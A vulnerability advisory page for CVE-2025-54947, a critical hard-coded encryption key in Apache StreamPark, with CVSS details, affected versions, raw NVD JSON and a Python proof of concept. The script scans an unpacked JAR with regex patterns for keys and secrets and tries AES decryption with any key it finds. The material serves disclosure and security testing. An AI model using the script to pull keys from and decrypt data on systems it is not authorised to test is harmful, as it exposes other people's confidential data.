Security Vulnerability Report
CVE-2025-54947 CVSS 9.8 CRITICAL

CVE-2025-54947

Published: 2025-12-12 15:15:54
Last Modified: 2025-12-15 17:20:47

Description

In Apache StreamPark versions 2.0.0 up to, but not including, 2.1.7, a security vulnerability involving a hard-coded encryption key exists. The system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access. This issue affects Apache StreamPark from 2.0.0 up to, but not including, 2.1.7. Users are recommended to upgrade to version 2.1.7, which fixes the issue.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:* - VULNERABLE
Apache StreamPark >= 2.0.0
Apache StreamPark < 2.1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
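# CVE-2025-54947 PoC - Hardcoded Encryption Key Extraction
# This PoC demonstrates extracting hardcoded keys from Apache StreamPark
#
# Reviewer notes:
# - The scan is a generic pattern search over an unpacked JAR; every hit is
#   a lead to confirm by hand, not a confirmed key.
# - An empty result does not show that a build is unaffected. The advisory's
#   remediation is upgrading to 2.1.7; data encrypted under the fixed key in
#   earlier releases should be treated as exposed.
# - The output contains candidate key material, so handle terminal and CI
#   logs of a run as sensitive.
import os
import re
import zipfile


def extract_jar(jar_path, extract_dir):
    """Extract JAR file contents into ``extract_dir``.

    Args:
        jar_path: Path to the JAR (ZIP) archive to unpack.
        extract_dir: Directory the archive members are written to.

    Raises:
        OSError, zipfile.BadZipFile: If the archive cannot be opened or read.
    """
    # NOTE(review): extractall() places no limit on the unpacked size, so
    # run this only on archives from a source you trust (for example your
    # own deployment's artifact).
    with zipfile.ZipFile(jar_path, 'r') as zip_ref:
        zip_ref.extractall(extract_dir)


def search_hardcoded_keys(directory):
    """Search the files under ``directory`` for hardcoded encryption keys.

    Files ending in .java, .class, .properties or .yml are read as text and
    matched against a fixed list of assignment-style patterns.

    Args:
        directory: Root of the tree to walk.

    Returns:
        A list of dicts with the keys 'file', 'key' and 'pattern'. Each
        (file, key) pair is reported once, under the first pattern that
        matched it, so the length of the list is the number of distinct
        candidates rather than the number of pattern hits.
    """
    key_patterns = [
        r'(?i)(?:AES|DES|RSA|ENCRYPT).{0,20}?=\s*["\']([a-zA-Z0-9+/=]{16,})["\']',
        r'(?i)KEY\s*=\s*["\']([a-zA-Z0-9]{16,64})["\']',
        r'(?i)(?:SECRET|PRIVATE).{0,20}?=\s*["\']([a-zA-Z0-9+/=]{16,})["\']',
        r'Base64\.decode\(["\']([a-zA-Z0-9+/=]{20,})["\']'
    ]
    # Compile once per call instead of once per file.
    compiled = [(pattern, re.compile(pattern)) for pattern in key_patterns]
    scanned_suffixes = ('.java', '.class', '.properties', '.yml')

    findings = []
    seen = set()
    for root, _dirs, files in os.walk(directory):
        for name in files:
            if not name.endswith(scanned_suffixes):
                continue
            filepath = os.path.join(root, name)
            try:
                # errors='ignore' drops undecodable bytes, so binary files
                # are scanned on a best-effort basis only.
                with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
                    content = f.read()
            except OSError as e:
                print(f"Error reading {filepath}: {e}")
                continue
            for pattern, regex in compiled:
                for match in regex.findall(content):
                    # One assignment can satisfy several patterns (an
                    # "AES_KEY = ..." line matches the first two); count
                    # it once so the reported total is not inflated.
                    if (filepath, match) in seen:
                        continue
                    seen.add((filepath, match))
                    findings.append({
                        'file': filepath,
                        'key': match,
                        'pattern': pattern
                    })
    return findings


def decrypt_with_key(encrypted_data, key):
    """Decrypt data using extracted key.

    Args:
        encrypted_data: Ciphertext bytes.
        key: Key as text; it is UTF-8 encoded before use.

    Returns:
        The decoded plaintext, or a string starting with
        "Decryption failed:" when any step raises. Callers have to check
        for that prefix, because failure is not signalled by an exception.
    """
    # Implementation depends on the encryption algorithm used.
    # AES-ECB is an illustrative assumption; the advisory text on this page
    # does not name the algorithm or mode.
    # Requires the third-party Crypto package; imported here so the scan
    # above works without it.
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import unpad
    try:
        cipher = AES.new(key.encode('utf-8'), AES.MODE_ECB)
        decrypted = unpad(cipher.decrypt(encrypted_data), AES.block_size)
        return decrypted.decode('utf-8')
    except Exception as e:  # deliberate best-effort: report, do not raise
        return f"Decryption failed: {e}"


# Main execution
if __name__ == "__main__":
    streampark_jar = "streampark-common.jar"
    extract_dir = "extracted"

    print("CVE-2025-54947 PoC - Extracting hardcoded keys from Apache StreamPark")
    print("=" * 70)

    # Stop when the archive is missing: scanning an absent or stale
    # directory would print "No hardcoded keys found", which reads like a
    # clean result although nothing was checked.
    if not os.path.exists(streampark_jar):
        print(f"[-] {streampark_jar} not found; nothing was scanned")
        raise SystemExit(1)

    # Extract JAR
    extract_jar(streampark_jar, extract_dir)
    print(f"[+] Extracted {streampark_jar} to {extract_dir}")

    # Search for keys
    findings = search_hardcoded_keys(extract_dir)
    if findings:
        print(f"\n[+] Found {len(findings)} potential hardcoded keys:")
        for i, finding in enumerate(findings, 1):
            print(f"\n[{i}] File: {finding['file']}")
            print(f"    Key: {finding['key']}")
    else:
        print("[-] No hardcoded keys found")

    print("\n[!] Note: This PoC is for authorized security testing only")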

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54947", "sourceIdentifier": "[email protected]", "published": "2025-12-12T15:15:53.577", "lastModified": "2025-12-15T17:20:46.757", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access.\n\nThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\n\nUsers are recommended to upgrade to version 2.1.7, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-321"}]}, {"source": "[email 
protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.1.7", "matchCriteriaId": "18BD3C9F-61F6-4D68-B0E7-333A94F827ED"}]}]}], "references": [{"url": "https://lists.apache.org/thread/kdntmzyzrco75x9q6mc6s8lty1fxmog1", "source": "[email protected]", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/12/3", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}]}}